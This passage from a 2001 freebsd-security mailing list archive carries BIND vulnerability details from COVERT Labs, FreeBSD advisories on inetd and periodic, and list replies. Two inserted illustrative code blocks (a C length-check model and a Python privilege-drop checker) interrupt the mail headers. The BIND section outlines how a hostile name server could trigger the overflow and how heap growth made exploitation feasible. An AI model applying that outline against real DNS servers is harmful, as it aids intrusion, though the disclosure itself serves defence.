The BIND 4 vulnerability is a sprintf into a 999 byte stack buffer that occurs when BIND formulates a message warning the administrator of an inconsistency or error resolving a Name Server record to an IP address. The vulnerability occurs within nslookupComplain(), which is a static utility function used by nslookup(). When BIND encounters a query that it can not answer from its cache or zone files, it attempts to forward the query to a name server that is capable of resolving it or referring BIND to a more appropriate server. When BIND forwards a query, it creates a qinfo structure to keep track of the request. It also creates this structure in order to track requests initiated by itself in order to find various linkage information. BIND can determine potential name servers to which to forward by walking through each label in the query in its database, looking for stored NS records. The purpose of the nslookup() function is to take a list of NS records and populate a qinfo structure with their corresponding IP addresses. BIND can then use those IP addresses as a list of name servers to which to attempt forwarding or sending a query. nslookup() performs certain sanity checks on the information that it retrieves.
For example, if it finds that a particular name server has an IP address of 0.0.0.0, 255.255.255.255, or a multicast address, then it will flag this condition as an error, warn the administrator via syslog, and move on to the next NS record. The function nslookupComplain() is called to warn the administrator and, as mentioned above, contains a stack overflow.

In order to trigger this overflow, an attacker needs to get BIND to cache an NS record with a very large length. Furthermore, the attacker needs to cache a record for the resolution of the NS record that contains one of the problem conditions for the logging. This is achievable by sending a query to a recursive name server, asking it to resolve a large name that is under the authority of a malicious name server. The malicious name server then needs to refer the request to another name server also with a large name, and provide an additional record giving an invalid address for that name server.

The limitations placed upon the character set allowed in domain names make the construction of a viable return address difficult. However, there is a potential for an attacker to make the name server return into memory that the attacker has forced the name server to allocate. In this case, vulnerability is contingent upon the location of the heap and the amount of memory available, as well as whether or not the operating system has a policy of lazy swap page allocation as opposed to an eager reservation policy. COVERT has verified that it is possible to exploit named running under Linux by growing the heap to sizes that far exceed the amount of memory and swap available. This was performed by utilizing specific patterns of memory allocation that maximize untouched memory.

The situation may be further complicated by the overwriting of two other stack based buffers, nsbuf and abuf, which are read from within the same sprintf that overflows the stack based buffer.
This does not come into play, however, if the value chosen to overwrite the saved return address does not utilize the terminating null byte of the string. It is worth noting that this behavior could make it easier for an attacker to exploit the problem under operating systems that implement sprintf such that overlapping copies are handled correctly.

The format string vulnerability in BIND 4 occurs in the syslog call in nslookupComplain(). This vulnerability is in the same section of code as the previously described buffer overflow, and thus can be triggered in a similar fashion by using an authoritative name server under malicious control. This vulnerability was corrected in bind-4.9.5-P1, although certain vendors' named implementations based upon this code remain vulnerable.

______________________________________________________________________

o Resolution

ISC has produced patches to address these issues. Except as otherwise noted, BIND version 4.9.8 and 8.2.3 resolve the vulnerabilities described in this advisory.

For ISC's description of these problems: http://www.isc.org/products/BIND/bind-security.html

To download updated versions of BIND: ftp://ftp.isc.org/isc/bind/src/

In cooperation with COVERT Labs, the CERT/CC is coordinating the collection of information on vulnerable distributions from third party vendors. For the most current vendor information, please read CERT Advisory CA-2001-02 "Multiple Vulnerabilities in BIND" available at: http://www.cert.org/advisories/CA-2001-02.html

______________________________________________________________________

o Credits

Discovery and documentation of these vulnerabilities was conducted by Anthony Osborne and John McDonald of the COVERT Labs at PGP Security.
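The msglen/buflen accounting that the Detailed Information section describes, as an added C model that is not the advisory's or BIND's code: only the names msglen and buflen and buflen's initial UDP value of 512 are taken from the advisory; struct req, struct verdict and every function below are constructed simplifications. It shows why a bounds check that derives the buffer size from msglen + buflen accepts an append on the unprocessed TSIG error path that a check against the true buffer size rejects.

```c
/*
 * Added educational model of the BIND 8 length-accounting flaw described in
 * COVERT-2001-01 (CAN-2001-10). This is not BIND source: msglen, buflen and
 * the UDP buflen value of 512 are the advisory's names and numbers; struct
 * req, struct verdict and every function below are constructed
 * simplifications for illustration.
 */
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define UDP_BUFSIZE ((size_t)512)   /* buflen's initial UDP value, per the advisory */

struct req {
    unsigned char buf[UDP_BUFSIZE];
    size_t msglen;   /* bytes of message currently held in buf */
    size_t buflen;   /* bytes the server believes are still free */
};

/* On receipt: msglen = bytes read from the network, buflen = the whole
 * buffer. These are the advisory's initial values; msglen + buflen equals
 * UDP_BUFSIZE only after normal processing has set the working values. */
static void req_init(struct req *r, const unsigned char *dgram, size_t n)
{
    if (n > UDP_BUFSIZE)
        n = UDP_BUFSIZE;
    memcpy(r->buf, dgram, n);
    r->msglen = n;
    r->buflen = UDP_BUFSIZE;
}

/* Normal processing sets the working values. The TSIG-without-key error
 * path in the advisory skips this step, so buflen keeps its initial value. */
static void req_begin_processing(struct req *r)
{
    r->buflen = UDP_BUFSIZE - r->msglen;
}

/* The invariant BIND relied on; a cheap audit assertion for any append site.
 * When it is false, deriving the buffer size from msglen + buflen is unsafe. */
static int invariant_holds(const struct req *r)
{
    return r->msglen + r->buflen == UDP_BUFSIZE;
}

/* Flawed check from the advisory: the buffer size is assumed to be
 * msglen + buflen, which on the error path is almost twice the real size.
 * Returns 1 if the append of n bytes is accepted. */
static int check_append_trusting(const struct req *r, size_t n)
{
    return r->msglen + n <= r->msglen + r->buflen;
}

/* Hardened check: free space comes from the buffer's true size alone, never
 * from a second counter that some code path may have left stale. This is
 * also the ground truth for whether the append really fits. */
static int check_append_hardened(const struct req *r, size_t n)
{
    return r->msglen <= UDP_BUFSIZE && n <= UDP_BUFSIZE - r->msglen;
}

/* Build a constructed 500-byte request, optionally run normal processing,
 * and report what each check says about appending n more bytes. */
struct verdict { int invariant, trusting, hardened; };

static struct verdict run_scenario(int processed, size_t n)
{
    unsigned char dgram[500];        /* constructed sample payload */
    struct req r;
    struct verdict v;
    memset(dgram, 'A', sizeof dgram);
    req_init(&r, dgram, sizeof dgram);
    if (processed)
        req_begin_processing(&r);
    v.invariant = invariant_holds(&r);
    v.trusting  = check_append_trusting(&r, n);
    v.hardened  = check_append_hardened(&r, n);
    return v;
}

int main(void)
{
    struct verdict e = run_scenario(0, 40);   /* error path: 12 bytes really free */
    struct verdict p = run_scenario(1, 40);   /* normal path, same request */
    printf("error path:  invariant=%d trusting=%d hardened=%d\n",
           e.invariant, e.trusting, e.hardened);   /* 0 1 0: flawed check accepts */
    printf("normal path: invariant=%d trusting=%d hardened=%d\n",
           p.invariant, p.trusting, p.hardened);   /* 1 0 0: both reject */
    return 0;
}
```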
______________________________________________________________________ o Contact Information For more information about the COVERT Labs at PGP Security, visit our website at http://www.pgp.com/covert or send e-mail to covert@nai.com ______________________________________________________________________ o Legal Notice The information contained within this advisory is Copyright (C) 2000 Networks Associates Technology Inc. It may be redistributed provided that no fee is charged for distribution and that the advisory is not modified in any way. Network Associates and PGP are registered Trademarks of Network Associates, Inc. and/or its affiliated companies in the United States and/or other Countries. All other registered and unregistered trademarks in this document are the sole property of their respective owners. ______________________________________________________________________ -----BEGIN PGP SIGNATURE----- Version: PGP 7.0.1 iQA+AwUBOnVuH6F4LLqP1YESEQJeAQCdEYWBrcstWvbnJy2LKwETm/SHkqoAmPp6 BCeuRNPzbt9tt3MuJ2W55gk= =xzwT -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jan 29 12: 8:39 2001 Delivered-To: freebsd-security@freebsd.org Received: from modemcable101.200-201-24.mtl.mc.videotron.ca (modemcable140.61-201-24.mtl.mc.videotron.ca [24.201.61.140]) by hub.freebsd.org (Postfix) with SMTP id 3A04737B698 for ; Mon, 29 Jan 2001 12:08:10 -0800 (PST) Received: (qmail 24091 invoked from network); 29 Jan 2001 20:08:09 -0000 Received: from cognac.local.mindstep.com (HELO cognac) (192.168.10.9) by jacuzzi.local.mindstep.com with SMTP; 29 Jan 2001 20:08:09 -0000 
From: "Patrick Bihan-Faou" To: Cc: Subject: Bash2 removes SSH_CLIENT from the environment Date: Mon, 29 Jan 2001 15:09:30 -0500 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0) X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400 Importance: Normal Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

Hi,

I am writing some script that looks for the SSH_CLIENT environment variable. As specified in the sshd(8) man page, this variable should contain the IP address of the client, the port number on the client side and the port number on the server side.

However I found that if the login shell of the user is set to bash (version 2.03 or 2.04 at least), this variable is never set. Upon inspection of the code for bash, it appears that bash is explicitly removing the definition of this environment variable. Would anybody have an idea why ???

Also the fix to leave SSH_CLIENT defined is trivial, is that something that would be desirable for the bash2 port ?

Patrick.

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jan 29 12:10:10 2001 Delivered-To: freebsd-security@freebsd.org Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by hub.freebsd.org (Postfix) with ESMTP id D802737B402 for ; Mon, 29 Jan 2001 12:09:50 -0800 (PST) Received: (from des@localhost) by flood.ping.uio.no (8.9.3/8.9.3) id VAA12740; Mon, 29 Jan 2001 21:09:00 +0100 (CET) (envelope-from des@ofug.org) X-URL: http://www.ofug.org/~des/ X-Disclaimer: The views expressed in this message do not necessarily coincide with those of any organisation or company with which I am or have been affiliated.
To: Buliwyf McGraw Cc: freebsd-security@FreeBSD.ORG Subject: Re: ecepass - proof of concept code for FreeBSD ipfw bypass (fwd) References: From: Dag-Erling Smorgrav Date: 29 Jan 2001 21:08:59 +0100 In-Reply-To: Buliwyf McGraw's message of "Mon, 29 Jan 2001 11:18:44 -0500 (COT)" Message-ID: Lines: 9 User-Agent: Gnus/5.0802 (Gnus v5.8.2) Emacs/20.4 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Buliwyf McGraw writes: > Very interesting... but not really novel, this vulnerability has been known (and patched) for some time now. DES -- Dag-Erling Smorgrav - des@ofug.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jan 29 12:35:43 2001 Delivered-To: freebsd-security@freebsd.org Received: by hub.freebsd.org (Postfix, from userid 758) id 6F88237B6A4; Mon, 29 Jan 2001 12:35:14 -0800 (PST) 
From: FreeBSD Security Advisories To: FreeBSD Security Advisories Subject: FreeBSD Security Advisory: FreeBSD-SA-01:11.inetd Reply-To: security-advisories@freebsd.org Message-Id: <20010129203514.6F88237B6A4@hub.freebsd.org> Date: Mon, 29 Jan 2001 12:35:14 -0800 (PST) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- ============================================================================= FreeBSD-SA-01:11 Security Advisory FreeBSD, Inc. Topic: inetd ident server allows remote users to partially read arbitrary wheel-accessible files Category: core Module: inetd Announced: 2001-01-29 Credits: Discovered during internal auditing Affects: FreeBSD 3.x (all releases) FreeBSD 4.x (all releases) Corrected: 2000-11-25 (FreeBSD 4.2-STABLE) 2001-01-26 (FreeBSD 3.5-STABLE) FreeBSD only: Yes I. Background The inetd ident server is an implementation of the RFC1413 identification server which returns the local username of the user connecting to a remote service. II. Problem Description During internal auditing, the internal ident server in inetd was found to incorrectly set group privileges according to the user. Due to ident using root's group permissions, users may read the first 16 (excluding initial whitespace) bytes of wheel-accessible files. All released versions of FreeBSD prior to the correction date including FreeBSD 3.5.1 and FreeBSD 4.2 are vulnerable. III. Impact Users can read the first 16 bytes of wheel-accessible files. To determine which may be potentially read, execute the following command as root: # find / -group wheel \( -perm -40 -a \! -perm +4 \) -ls The inetd internal ident server is not enabled by default. If you have not enabled the ident portion of inetd, you are not vulnerable. IV. Workaround Disable the internal ident server, if enabled: comment out all lines beginning with "auth" in /etc/inetd.conf, then restart inetd by sending it a SIGHUP: # killall -HUP inetd V. 
Solution One of the following: Upgrade the vulnerable FreeBSD system to 3.5-STABLE or 4.2-STABLE after the correction date. To patch your present system: download the relevant patch from the below location, and execute the following commands as root: [FreeBSD 4.2 base system] # fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-01:11/inetd-4.2.patch # fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-01:11/inetd-4.2.patch.asc Verify the detached PGP signature using your PGP utility. # cd /usr/src/usr.sbin/inetd # patch -p < /path/to/patch # make depend && make all install # killall -HUP inetd [FreeBSD 3.5.1 base system] # fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-01:11/inetd-3.5.1.patch # fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-01:11/inetd-3.5.1.patch.asc Verify the detached PGP signature using your PGP utility. # cd /usr/src/usr.sbin/inetd # patch -p < /path/to/patch # make depend && make all install # killall -HUP inetd -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iQCVAwUBOnXTplUuHi5z0oilAQFrhQP/QbPbjKwIlhpT50jDhsjKs0NFH7kznkFi SQJ6ZTYOMEGml5CVc9rLUxmSk+FE7hvZAhVu5+Qc+UHniyQnjOVNXaDvICiN6kMz AEs3UQlVK5Hp8QzXikC9Q4wy//yFC+aNhECVW9u0B3k5sAzqitoI7FWexLpcTMFI 1ZWKYOWLo8o= =0Se/ -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jan 29 12:44:42 2001 Delivered-To: freebsd-security@freebsd.org Received: from obsecurity.org (adsl-64-169-104-72.dsl.lsan03.pacbell.net [64.169.104.72]) by hub.freebsd.org (Postfix) with ESMTP id B5FD337B400 for ; Mon, 29 Jan 2001 12:44:20 -0800 (PST) Received: by obsecurity.org (Postfix, from userid 1000) id E59FEBA2AF; Mon, 29 Jan 2001 12:44:50 -0800 (PST) Date: Mon, 29 Jan 2001 12:44:50 -0800 
From: Kris Kennaway To: "Si." Cc: freebsd-security@FreeBSD.ORG Subject: Re: [COVERT-2001-01] Multiple Vulnerabilities in BIND - FreeBSD Implications ? Message-ID: <20010129124450.A26735@xor.obsecurity.org> References: <01C089BD.2D821D20@w240.z064220178.sjc-ca.dsl.cnc.net> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="+QahgC5+KEYLbs62" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from si@chemicalterrorism.com on Mon, Jan 29, 2001 at 07:55:44PM +0000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --+QahgC5+KEYLbs62 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline On Mon, Jan 29, 2001 at 07:55:44PM +0000, Si. wrote: > 1) The nice people ISC. > 2) The nice people at freebsd-security, i.e. Kris and his team ? It's fixed in BIND 8.2.3, which is being imported into 4.x and 3.x as we speak (it's already in -current). I had hoped to have it done by the time the advisories were released, but circumstances conspired to prevent it. The timing of our advisory 01:10 last week has potential for confusion, but that does not relate to these recent bugs. We hope to have a new advisory out in a couple of days, but in the meantime everyone is urged to upgrade to 4.2-STABLE or 3.5-STABLE once the upgrades are in, or switch to the bind8 port (also not yet updated). I'll drop another note when the relevant upgrades are in place. 
Kris --+QahgC5+KEYLbs62 Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE6ddZCWry0BWjoQKURAhu2AKDfRfXeDsvxBTcRhJnaa8Z3xmfuMACgybs6 HHhOelG4uNoFi+/AgWaiGwQ= =XHif -----END PGP SIGNATURE----- --+QahgC5+KEYLbs62-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jan 29 12:51:34 2001 Delivered-To: freebsd-security@freebsd.org Received: by hub.freebsd.org (Postfix, from userid 758) id B149137B69D; Mon, 29 Jan 2001 12:51:06 -0800 (PST) 
From: FreeBSD Security Advisories To: FreeBSD Security Advisories Subject: FreeBSD Security Advisory: FreeBSD-SA-01:12.periodic Reply-To: security-advisories@freebsd.org Message-Id: <20010129205106.B149137B69D@hub.freebsd.org> Date: Mon, 29 Jan 2001 12:51:06 -0800 (PST) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- ============================================================================= FreeBSD-SA-01:12 Security Advisory FreeBSD, Inc. Topic: periodic uses insecure temporary files Category: core Module: periodic Announced: 2001-01-29 Credits: dynamo Affects: FreeBSD 4.1-STABLE after 2000-09-20, 4.1.1-RELEASE, and 4.1.1-STABLE prior to the correction date. No FreeBSD 3.x versions are affected. Corrected: 2000-11-11 FreeBSD only: Yes I. Background periodic is a program to run periodic system functions. II. Problem Description A vulnerability was inadvertently introduced into periodic that caused temporary files with insecure file names to be used in the system's temporary directory. This may allow a malicious local user to cause arbitrary files on the system to be corrupted. By default, periodic is normally called by cron for daily, weekly, and monthly maintenance. Because these scripts run as root, an attacker may potentially corrupt any file on the system. FreeBSD 4.1-STABLE after 2000-09-20, 4.1.1-RELEASE, and 4.1.1-STABLE prior to the correction date are vulnerable. The problem was corrected prior to the release of FreeBSD 4.2. III. Impact Malicious local users can cause arbitrary files on the system to be corrupted. IV. Workaround Do not allow periodic to be used in untrusted multi-user environments. Disable the normal periodic system maintenance scripts by either commenting-out or removing the periodic entries in /etc/crontab. V. Solution One of the following: 1) Upgrade the vulnerable FreeBSD system to 4.1.1-STABLE after the correction date. 
2) Affected FreeBSD 4.x systems prior to the correction date: Download the patch and the detached PGP signature from the following locations, and verify the signature using your PGP utility. ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-01:12/periodic.patch ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-01:12/periodic.patch.asc Execute the following commands as root: # cd /usr/src/usr.sbin/periodic # patch -p < /path/to/patch # make depend && make all install -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iQCVAwUBOnXXDlUuHi5z0oilAQF2ngP6AoaNPtHkCuJwT07dKfayh9GH14G1HXsK SN3LznlLG3CyK4WBVGnx32p5Ct3zP0sO0QS+UAY9hMDMBprkUN6ewfuJ7gjczffv GgVBeWRxOOdH+/wpYkcTsg7sxKFWqg+xSZAzJEDBAqiFigf/xIrrrCtrDiDvGED2 8/9DxH59f0g= =ZUss -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jan 29 13: 6:44 2001 Delivered-To: freebsd-security@freebsd.org Received: by hub.freebsd.org (Postfix, from userid 758) id 30FE737B402; Mon, 29 Jan 2001 13:06:12 -0800 (PST) 
From: FreeBSD Security Advisories
To: FreeBSD Security Advisories
Subject: FreeBSD Security Advisory: FreeBSD-SA-01:12.periodic [REVISED]
Reply-To: security-advisories@freebsd.org
Message-Id: <20010129210612.30FE737B402@hub.freebsd.org>
Date: Mon, 29 Jan 2001 13:06:12 -0800 (PST)
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

-----BEGIN PGP SIGNED MESSAGE-----

=============================================================================
FreeBSD-SA-01:12                                           Security Advisory
                                                                FreeBSD, Inc.

Topic:          periodic uses insecure temporary files [REVISED]

Category:       core
Module:         periodic
Announced:      2001-01-29
Revised:        2001-01-29
Credits:        David Lary
Affects:        FreeBSD 4.1-STABLE after 2000-09-20, 4.1.1-RELEASE, and
                4.1.1-STABLE prior to the correction date.
                No FreeBSD 3.x versions are affected.
Corrected:      2000-11-11
FreeBSD only:   Yes

0.   Revision History

v1.0  2001-01-29  Initial release
v1.1  2001-01-29  Correctly credit original problem reporter

I.   Background

periodic is a program to run periodic system functions.

II.  Problem Description

A vulnerability was inadvertently introduced into periodic that caused
temporary files with insecure file names to be used in the system's
temporary directory. This may allow a malicious local user to cause
arbitrary files on the system to be corrupted.

By default, periodic is normally called by cron for daily, weekly, and
monthly maintenance. Because these scripts run as root, an attacker may
potentially corrupt any file on the system.

FreeBSD 4.1-STABLE after 2000-09-20, 4.1.1-RELEASE, and 4.1.1-STABLE prior
to the correction date are vulnerable. The problem was corrected prior to
the release of FreeBSD 4.2.

III. Impact

Malicious local users can cause arbitrary files on the system to be
corrupted.

IV.  Workaround

Do not allow periodic to be used in untrusted multi-user environments.
Disable the normal periodic system maintenance scripts by either
commenting-out or removing the periodic entries in /etc/crontab.

V.   Solution

One of the following:

1) Upgrade the vulnerable FreeBSD system to 4.1.1-STABLE after the
correction date.

2) Affected FreeBSD 4.x systems prior to the correction date:

Download the patch and the detached PGP signature from the following
locations, and verify the signature using your PGP utility.

ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-01:12/periodic.patch
ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-01:12/periodic.patch.asc

Execute the following commands as root:

# cd /usr/src/usr.sbin/periodic
# patch -p < /path/to/patch
# make depend && make all install

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.4 (FreeBSD)
Comment: For info see http://www.gnupg.org

iQCVAwUBOnXa7lUuHi5z0oilAQHW2AP7BP+YRA93Guy+ImRy1O2IHw/6qYBivSA1
fpYrTERUyyBHbe04KypWjloHfzvKIZoYApXdleECkVBPMYwNPNixTYVrU4zR4qbC
EjgtF4OhjLjmO/LqbKPiwDC7TEWWi3OtPWwpJlqT7uNoHmg+o6ySTJPPyrpAFuUQ
FS8I+DjVESA=
=wBFp
-----END PGP SIGNATURE-----

From owner-freebsd-security Mon Jan 29 13: 7:10 2001
Delivered-To: freebsd-security@freebsd.org
Received: by hub.freebsd.org (Postfix, from userid 758) id 015E137B698; Mon, 29 Jan 2001 13:06:31 -0800 (PST)
From: FreeBSD Security Advisories
To: FreeBSD Security Advisories
Subject: FreeBSD Security Advisory: FreeBSD-SA-01:11.inetd [REVISED]
Reply-To: security-advisories@freebsd.org
Message-Id: <20010129210631.015E137B698@hub.freebsd.org>
Date: Mon, 29 Jan 2001 13:06:31 -0800 (PST)
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

-----BEGIN PGP SIGNED MESSAGE-----

=============================================================================
FreeBSD-SA-01:11                                           Security Advisory
                                                                FreeBSD, Inc.

Topic:          inetd ident server allows remote users to partially read
                arbitrary wheel-accessible files [REVISED]

Category:       core
Module:         inetd
Announced:      2001-01-29
Revised:        2001-01-29
Credits:        dynamo
Affects:        FreeBSD 3.x (all releases)
                FreeBSD 4.x (all releases)
Corrected:      2000-11-25 (FreeBSD 4.2-STABLE)
                2001-01-26 (FreeBSD 3.5-STABLE)
FreeBSD only:   Yes

0.   Revision History

v1.0  2001-01-29  Initial release
v1.1  2001-01-29  Correctly credit original problem reporter

I.   Background

The inetd ident server is an implementation of the RFC1413 identification
server which returns the local username of the user connecting to a remote
service.

II.  Problem Description

During internal auditing, the internal ident server in inetd was found to
incorrectly set group privileges according to the user. Due to ident using
root's group permissions, users may read the first 16 (excluding initial
whitespace) bytes of wheel-accessible files.

All released versions of FreeBSD prior to the correction date including
FreeBSD 3.5.1 and FreeBSD 4.2 are vulnerable.

III. Impact

Users can read the first 16 bytes of wheel-accessible files. To determine
which may be potentially read, execute the following command as root:

# find / -group wheel \( -perm -40 -a \! -perm +4 \) -ls

The inetd internal ident server is not enabled by default. If you have not
enabled the ident portion of inetd, you are not vulnerable.

IV.  Workaround

Disable the internal ident server, if enabled: comment out all lines
beginning with "auth" in /etc/inetd.conf, then restart inetd by sending it
a SIGHUP:

# killall -HUP inetd

V.   Solution

One of the following:

Upgrade the vulnerable FreeBSD system to 3.5-STABLE or 4.2-STABLE after the
correction date.

To patch your present system: download the relevant patch from the below
location, and execute the following commands as root:

[FreeBSD 4.2 base system]

# fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-01:11/inetd-4.2.patch
# fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-01:11/inetd-4.2.patch.asc

Verify the detached PGP signature using your PGP utility.

# cd /usr/src/usr.sbin/inetd
# patch -p < /path/to/patch
# make depend && make all install
# killall -HUP inetd

[FreeBSD 3.5.1 base system]

# fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-01:11/inetd-3.5.1.patch
# fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-01:11/inetd-3.5.1.patch.asc

Verify the detached PGP signature using your PGP utility.

# cd /usr/src/usr.sbin/inetd
# patch -p < /path/to/patch
# make depend && make all install
# killall -HUP inetd

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.4 (FreeBSD)
Comment: For info see http://www.gnupg.org

iQCVAwUBOnXa9FUuHi5z0oilAQGoPQP+ItWj4ScnyoBGBQw/CMLQN0XHWcEaT777
dY8IL6U6NeSI0g/XAk5mVk2a0AExqimkhZFtaphg49y8XwjgbWGqtWHh0YMHa4k3
ILtpOKQpDiGRda15FQUX+Pij8m3T1UdOmFQgCw2hFWnLh3eSgye7thHJzBjUlxCM
WI5aiOcdOk4=
=aAJS
-----END PGP SIGNATURE-----

From owner-freebsd-security Mon Jan 29 13:12:12 2001
Delivered-To: freebsd-security@freebsd.org
Received: from ducky.nz.freebsd.org (ns1.unixathome.org [203.79.82.27]) by hub.freebsd.org (Postfix) with ESMTP id 2455737B698 for ; Mon, 29 Jan 2001 13:11:50 -0800 (PST)
Received: from xeon (xeon.unixathome.org [192.168.0.18]) by ducky.nz.freebsd.org (8.9.3/8.9.3) with ESMTP id KAA51163 for ; Tue, 30 Jan 2001 10:11:46 +1300 (NZDT)
Date: Tue, 30 Jan 2001 10:11:49 +1300 (NZDT)
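The failure SA-01:11 describes is a privilege drop that changed the user but left the process with root's group. The following is an added example, not inetd's code and not part of the advisory: a drop routine that sets the supplementary groups and the gid before the uid, then reads all three id sets back to confirm the drop actually took effect. `FakeKernel` is a constructed stand-in for the `os` module so the sequence can be exercised without running as root; it models only the rule that matters here, that a process whose uid is no longer 0 may not change its gid or group list. Names, uids and gids below are invented for the demonstration.

```python
import os


class PrivilegeDropError(RuntimeError):
    """Raised when the process is not running as exactly the requested ids."""


def drop_privileges(uid, gid, groups=(), api=os):
    """Irreversibly switch to uid/gid/groups via the id-setting calls of `api`."""
    if uid == 0 or gid == 0 or 0 in groups:
        raise PrivilegeDropError("refusing to 'drop' to root")
    # Groups first: they can only be changed while the process is still root.
    api.setgroups(list(groups))
    api.setgid(gid)
    # The uid goes last; after this call the two calls above would fail.
    api.setuid(uid)
    verify_dropped(uid, gid, groups, api)


def verify_dropped(uid, gid, groups, api=os):
    """Check real, effective and saved ids; any leftover root id is a failure.
    The SA-01:11 bug is exactly this state: uid switched, gid still root's."""
    if api.getresuid() != (uid, uid, uid):
        raise PrivilegeDropError(f"uid not dropped: {api.getresuid()}")
    if api.getresgid() != (gid, gid, gid):
        raise PrivilegeDropError(f"gid not dropped: {api.getresgid()}")
    if set(api.getgroups()) != set(groups):
        raise PrivilegeDropError(f"groups not dropped: {api.getgroups()}")


class FakeKernel:
    """Constructed stand-in for os: starts as root, enforces one EPERM rule."""

    def __init__(self):
        self.uid, self.gid, self.groups = 0, 0, [0]

    def _must_be_root(self, call):
        if self.uid != 0:
            raise PermissionError(f"{call}: EPERM")

    def setgroups(self, groups):
        self._must_be_root("setgroups")
        self.groups = list(groups)

    def setgid(self, gid):
        self._must_be_root("setgid")
        self.gid = gid

    def setuid(self, uid):
        self._must_be_root("setuid")
        self.uid = uid

    def getresuid(self):
        return (self.uid,) * 3

    def getresgid(self):
        return (self.gid,) * 3

    def getgroups(self):
        return list(self.groups)


def ident_style_drop(uid, gid, groups, api):
    """The buggy pattern: only the uid is changed, root's group is kept.
    verify_dropped() catches it."""
    api.setuid(uid)
    verify_dropped(uid, gid, groups, api)


def wrong_order_drop(uid, gid, api):
    """uid before gid: the kernel refuses the second call with EPERM."""
    api.setuid(uid)
    api.setgid(gid)


def drop_detects(fn, *args):
    """Return the exception name `fn` raises, or None if it succeeds."""
    try:
        fn(*args)
    except (PrivilegeDropError, PermissionError) as exc:
        return type(exc).__name__
    return None


if __name__ == "__main__":
    k = FakeKernel()
    drop_privileges(1001, 1001, [1001, 20], api=k)
    print("correct drop ->", (k.uid, k.gid, k.groups))
    print("uid-only drop ->", drop_detects(ident_style_drop, 1001, 1001, [1001], FakeKernel()))
    print("uid before gid ->", drop_detects(wrong_order_drop, 1001, 1001, FakeKernel()))
```

Against the real `os` module the same `drop_privileges()` has to run as root, and `verify_dropped()` is the part worth keeping in any daemon: a drop that is not read back is a drop you are trusting, not checking.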
From: Dan Langille X-X-Sender: To: Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-01:11.inetd In-Reply-To: <20010129203514.6F88237B6A4@hub.freebsd.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org This patch won't work as advertised: On Mon, 29 Jan 2001, FreeBSD Security Advisories wrote: > # cd /usr/src/usr.sbin/inetd That should be /usr, otherwise it will fail to patch. > # patch -p < /path/to/patch Then you need to cd /usr/src/usr.sbin/inetd > # make depend && make all install > # killall -HUP inetd [my thanks to Laz for his help in getting this to work] To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jan 29 13:19:54 2001 Delivered-To: freebsd-security@freebsd.org Received: by hub.freebsd.org (Postfix, from userid 758) id 5B75F37B699; Mon, 29 Jan 2001 13:19:19 -0800 (PST) 
From: FreeBSD Security Advisories
